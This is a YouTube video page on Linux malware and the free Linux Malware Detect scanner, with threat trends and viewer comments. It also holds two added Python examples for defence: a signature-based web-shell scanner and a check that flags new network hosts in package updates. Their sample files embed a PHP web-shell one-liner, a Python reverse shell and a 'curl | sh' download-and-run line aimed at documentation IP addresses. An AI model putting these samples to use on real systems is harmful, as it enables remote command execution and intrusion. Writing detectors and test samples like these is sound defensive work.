Linux Malware: 5-Minute Fix
- Published 8 Oct 2024
- Think you are safe from malware while using Linux? Think again.
Malware for Linux is rising. I have some tools that may help detect and clean it from your system. All Free.
Github for LMD: github.com/rfx...
Here are some trends in Linux malware threats in 2024:
Increased attacks
In the first quarter of 2024, there was a nearly 130% increase in attacks on Linux users compared to the same period in 2023.
New ransomware variants
Some new ransomware variants targeting Linux include:
Mallox: Updated in 2024 to target Linux devices using a Python script
TellYouThePass: A new variant of the "TargetCompany" ransomware family that targets VMware ESXi environments
Play: A new Linux variant that targets ESXi environments and uses a double-extortion tactic
Rootkits
A particularly insidious type of malware that can go undetected for long periods
Vulnerabilities
Common detections and attack vectors include the web-shell signatures backdoor.php.webshell.smmr, backdoor.asp.webshell.gifjmb and backdoor.python.webshell.ac, plus SQL injection and command injection
Exploiting Ray
Attackers are exploiting a vulnerability in the open-source framework Ray, which is used for machine learning, scientific computing, and data processing
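The web-shell names listed above are signature names: a scanner such as LMD flags a file when its contents match a stored pattern or hash. As an added illustration of that mechanism (this is not code from the video or from LMD, and the signature names, patterns and sample files are constructed for the example), here is a minimal pattern scanner that walks a directory and reports which constructed signatures each file triggers:

```python
"""Minimal signature-based web-shell scanner (added example, not LMD code).

Signatures are regexes over file contents, in the spirit of LMD's
pattern signatures. Names, patterns and sample files are constructed for
this example; none of this is LMD's real signature database.
"""
import os
import re
import tempfile
from typing import Dict, List, Tuple

# Constructed signatures: name -> compiled regex. Real scanners carry
# thousands of these plus hash lists; three are enough to show the mechanism.
SIGNATURES: Dict[str, re.Pattern] = {
    # PHP: eval() fed by a decoding/inflating function (obfuscated payload)
    "php.eval_obfuscated": re.compile(
        rb"eval\s*\(\s*(base64_decode|gzinflate|str_rot13)\s*\(", re.I),
    # PHP: shell-execution function fed straight from request parameters
    "php.cmd_from_request": re.compile(
        rb"\b(system|passthru|shell_exec|exec|popen)\s*\(\s*\$_(GET|POST|REQUEST|COOKIE)\b",
        re.I),
    # Python: socket connect followed by spawning /bin/sh (reverse shell)
    "generic.reverse_shell": re.compile(
        rb"socket\.socket.*?connect\(.*?/bin/sh", re.S),
}

SCAN_EXTENSIONS = {".php", ".phtml", ".py", ".sh", ".cgi", ".pl"}
MAX_FILE_BYTES = 4 * 1024 * 1024  # skip very large files, as most scanners do


def scan_file(path: str) -> List[str]:
    """Return the names of all signatures matching the file's contents."""
    try:
        if os.path.getsize(path) > MAX_FILE_BYTES:
            return []
        with open(path, "rb") as fh:
            data = fh.read()
    except OSError:
        return []
    return [name for name, rx in SIGNATURES.items() if rx.search(data)]


def scan_tree(root: str) -> List[Tuple[str, str]]:
    """Walk root and return (relative path, signature) pairs for every hit."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for fname in files:
            if os.path.splitext(fname)[1].lower() not in SCAN_EXTENSIONS:
                continue
            full = os.path.join(dirpath, fname)
            for sig in scan_file(full):
                hits.append((os.path.relpath(full, root), sig))
    return sorted(hits)


# Constructed sample files: one benign page and two suspicious ones.
SAMPLE_FILES = {
    "index.php": b"<?php echo 'hello'; ?>\n",
    "uploads/c99ish.php": b"<?php eval(base64_decode($_POST['p'])); system($_GET['cmd']); ?>\n",
    "cron/update.py": (b"import socket,subprocess,os\n"
                       b"s=socket.socket()\n"
                       b"s.connect(('203.0.113.5',4444))\n"
                       b"subprocess.call(['/bin/sh','-i'])\n"),
}


def scan_samples() -> List[Tuple[str, str]]:
    """Write the constructed samples to a temp dir and scan them."""
    with tempfile.TemporaryDirectory() as root:
        for rel, content in SAMPLE_FILES.items():
            full = os.path.join(root, rel)
            os.makedirs(os.path.dirname(full), exist_ok=True)
            with open(full, "wb") as fh:
                fh.write(content)
        return scan_tree(root)


if __name__ == "__main__":
    for rel, sig in scan_samples():
        print(f"HIT {rel}: {sig}")
```

Point scan_tree() at a web root such as /var/www to try it on real files (run it as a user that can read everything, or it silently skips what it cannot open). Two caveats matter in practice: pattern signatures are evaded by anyone who re-encodes the payload, which is why scanners like LMD pair them with hash signatures and frequent updates; and a filesystem scan cannot see a kernel rootkit of the kind the description warns about, because it trusts the running kernel's answers about which files and processes exist.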
Want more details? Check these out:
Linux Threats: www.trendmicro...
All CyberSecurity Threats: www.trendmicro...
AI Thumbnail: Clint Pengwood
Support me on Patreon: / djware
Follow me:
Twitter @djware55
Facebook: / don.ware.7758
Gitlab: gitlab.com/djw...
#djware #cybergizmo #malware - Science & Technology
Github for LMD: github.com/rfxn/linux-malware-detect
To my understanding there are tons of Linux malware, but they target where Linux has the big market share: servers. If desktop Linux became popular enough, it would surprise me a lot if Linux malware for desktop didn't become more common. So I tend to be careful online regardless of the OS I'm on.
While it is true that some of the malware attacks Apache servers, there is a growing class of malware which is coming after desktop users as well.
@@CyberGizmo Yeah, it wasn't meant as a counter to your point, just an addition.
Thumbnail: Clint TuxWood
Thanks for that information, knowledgeable Linux Papa Smurf!
Thanks for the intel.
With Linux growing in popularity, I've decided that the next time I reinstall I should probably invest some time into security.
How do I know that the thing I download from some random git repo doesn't itself contain or download malware?
Not asking to be a smart a$$.
You might want to check how long the author has been on GitHub, what their ratings are, what other projects they have worked on, and if still in doubt ask around in the Linux communities.
@@CyberGizmo Thanks. Ken Thompson did a number on me with his paper "Reflections On Trusting Trust". That is my cross to bear.
I wasn't aware of this... yet I've been yapping around about a decent malware tool being long overdue on Linux. It seems its scope is still limited to on-file stuff (yes, on Linux most things are a file...) and what gets flagged, because I dread the day I find out something seemingly innocent (to another piece of software) is lying dormant in the filesystem only to be woken into action by some inotify trigger, curling and assembling some piece of malware into a shell.
Linux is growing and that attracts the hacking community. The 'tinfoil hat' philosophy that Linux is super-safe is ridiculous!
"Security via obscurity" was always a dodgy proposition... control the idiot at the keyboard to limit the pain. 🙃
Linux IS super safe compared to proprietary OS alternatives. Critical vulnerabilities are fewer, discussed in the open, and patched faster.
Hackers have always been interested in Linux because the majority of the planet's business infrastructure runs on it. While Linux is only beginning to have strong representation in desktop PCs, the real money to be made hacking is exploiting business servers.
Linux security is a little better than Windows.
@@demos113 There are ways that the term applies. Being a minority OS isn't one of them. I'll give a simple one that might free a cat or two...
When the US fought in WW2 they used Navajo speakers rather than create a code language of their own. It had a known format, but the double obscurity made it a great choice.
1. Being a real language, those trying to decode it would often be led off the path to its deconstruction. (in plain sight but obscured)
2. Well, the obscurity of it still remaining, while unknown, "encoded", obscuring it away from initial prying eyes.
Had it not been a real language with an organic history... it would have lacked the "anti-patterns" that hamper a simple reverse engineering of "structurally built" codes.
The fact that I see within this an application of "security through obscurity" is in fact obscured by the application of "disguise", with the obscurity "under the mask" so to say. Your first reaction will be to disagree... until you look a little deeper.
I'm hoping they won't fully turn their gaze on Linux until/unless we get to 10% market share, but that's probably just wishful thinking. They are getting plenty of money from Windows users.
Is Kaspersky a good anti-malware program for Linux as well?
The majority of servers run Linux and Android uses the Linux kernel, so how did you arrive at 1+ percent for Linux when you include servers and phones? Doesn't add up, sir.
I'm curious why you picked LMD over ClamAV? Especially since LMD seems to be tailored to servers rather than desktops
Also use Symantec for production servers.
Thank you for this.
Nice, I will give this a try
You use more instead of less. Can I dare ask why? Just really curious.
You linked to a bunch of articles about malware but not to the github of any of the tools you mentioned. Can you post the github links?
github.com/rfxn/linux-malware-detect, I updated the description and pinned a comment as well, thanks for catching that, I must have overwritten it while editing the description.
Is an immutable distribution more resistant to malware?
While immutability offers some defense against malware, it is not foolproof. I compare it to a submarine... with a screen door.
I'm extremely new to Linux, I don't understand how to download this or make it clean my PC. None of the commands make sense to me, what do I do in order to run this?
@@temple69 I can help. What Linux distro did you install? Linux Mint, Ubuntu, Pop!_OS or something else?
@@minion3806 qubes
Debian
What happened to COPS and SATAN?
Ahhh yes, Dan Farmer's software. I believe SATAN was discontinued in 2006, and COPS you might still be able to find, but it's sort of regarded as obsolete today. Good question.
I'm somehow thinking China should be interested in the Linux OS market, but as far as I can search the market is at almost 0%.
@@Strammeiche Very few people in China can read Linux documentation in English. But all the Microsoft documentation is translated into Chinese.
This is a security boon for Linux.
👍DJ!
What is this "Linus" hardening software he talked about?
Lynis is how it's spelled.
@@JohnPitney Thanks for the help.
Thanks DJ. Hey man, I thought the words "Linux" and "malware" were mutually exclusive. 😉
We really need AI anti-virus software. We're constantly working with open source software. If we had an AI that could analyze the "intent" of the source code that compiles a piece of software, as opposed to essentially just regex'ing the byte code against a database of known malware, we could potentially get rid of this issue altogether.
Heuristics already do that... It is about accuracy. Trusted channels are the best way to avoid malware... don't go to dodgy sites, keep a safe perimeter, have battery backups for servers, routers, and other essential hardware to reduce attacks. Obscurity is always useful... Notoriety only when prepared to return to Obscurity.
@@roguegryphonica3147 As a dev I work a lot with code packages which are distributed and updated through stores which, unlike major Linux repos, do not have the capabilities to check them individually (npm, pip, etc). A single app can easily have a thousand such dependencies, and while I do look at the source code of modules I install for the first time, I do not always look at the entire dependency chain. And even when I do, the author of the module could push a "security patch" somewhere down the line and I would just pull those changes right into my own software, because I lack the resources to check a hundred git commits every single day.
This worries me a great deal. Heuristics can't help much if a package that's meant to download a patch from my own server suddenly downloads malware from a different one for example. Or if a module that's meant to encrypt my data using my key suddenly uses a different key and it then holds my data for ransom. I feel like AI could look at these commits and say "Hmmm, something isn't adding up here, this piece of code does not improve the core functionality that's claimed in the package description, let's ping it for human review."
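The first failure mode in the comment above (an update that quietly starts fetching from a different host) is mechanically checkable without any AI: list the hostnames and IP literals embedded in a package before and after the update and flag the ones that are new and not on an allow-list. The following is an added example, not code from the video or from the commenter; the two "releases", the allow-list and the host names in them are constructed stand-ins for two unpacked versions of a real package.

```python
"""Added example (not from the video or the commenter): flag network
destinations that a dependency update introduces.

The two "releases" below are constructed snippets standing in for two
unpacked versions of a package (e.g. from `pip download` or `npm pack`).
"""
import re
from typing import Dict, List, Set

URL_HOST_RE = re.compile(r"https?://([A-Za-z0-9.-]+)", re.I)
# Bare IPv4 literals are common in hard-coded C2 addresses. This also matches
# four-part version strings, so treat a hit as a prompt for review, not proof.
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


def hosts_in(files: Dict[str, str]) -> Set[str]:
    """Every hostname or IPv4 literal referenced anywhere in a file set."""
    hosts: Set[str] = set()
    for text in files.values():
        hosts.update(h.lower() for h in URL_HOST_RE.findall(text))
        hosts.update(IPV4_RE.findall(text))
    return hosts


def new_destinations(old: Dict[str, str], new: Dict[str, str],
                     allowed: Set[str]) -> List[str]:
    """Hosts the new version references that the old one did not, minus
    the project's allow-list. Sorted so the output is stable."""
    allow = {a.lower() for a in allowed}
    return sorted(hosts_in(new) - hosts_in(old) - allow)


# Constructed releases: v1 fetches patches from the maintainer's host; v2 is a
# "security patch" that also pulls a script from an unrelated address.
OLD_RELEASE = {
    "pkg/updater.py": (
        "import requests\n"
        "PATCH_URL = 'https://updates.example.com/patch'\n"
        "def fetch():\n"
        "    return requests.get(PATCH_URL, timeout=10).content\n"),
    "setup.py": "# see https://updates.example.com/docs\n",
}
NEW_RELEASE = {
    "pkg/updater.py": (
        "import requests, subprocess\n"
        "PATCH_URL = 'https://updates.example.com/patch'\n"
        "def fetch():\n"
        "    subprocess.run(['sh', '-c',\n"
        "        'curl -s http://203.0.113.77/p.sh | sh'])  # new in v2\n"
        "    return requests.get(PATCH_URL, timeout=10).content\n"),
    "setup.py": "# see https://updates.example.com/docs\n",
}
# Hosts the project is expected to talk to (constructed allow-list).
ALLOWED_HOSTS = {"updates.example.com", "pypi.org"}


def review_update() -> List[str]:
    """Run the check over the constructed releases."""
    return new_destinations(OLD_RELEASE, NEW_RELEASE, ALLOWED_HOSTS)


if __name__ == "__main__":
    flagged = review_update()
    if flagged:
        print("new network destinations, hold for human review:", flagged)
    else:
        print("no new network destinations")
```

In a real pipeline the two dicts come from reading every file of the previously pinned version and the candidate update, and a non-empty result blocks the bump until a human looks at it. The limitation is the obvious one: a string assembled at runtime or pulled from a config server never appears in the source, so this catches the lazy case only; the complement is egress allow-listing on the build and production hosts, which catches the connection itself regardless of how the address was hidden.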
Great video, like all yours!
Thank You @crosbowbeat!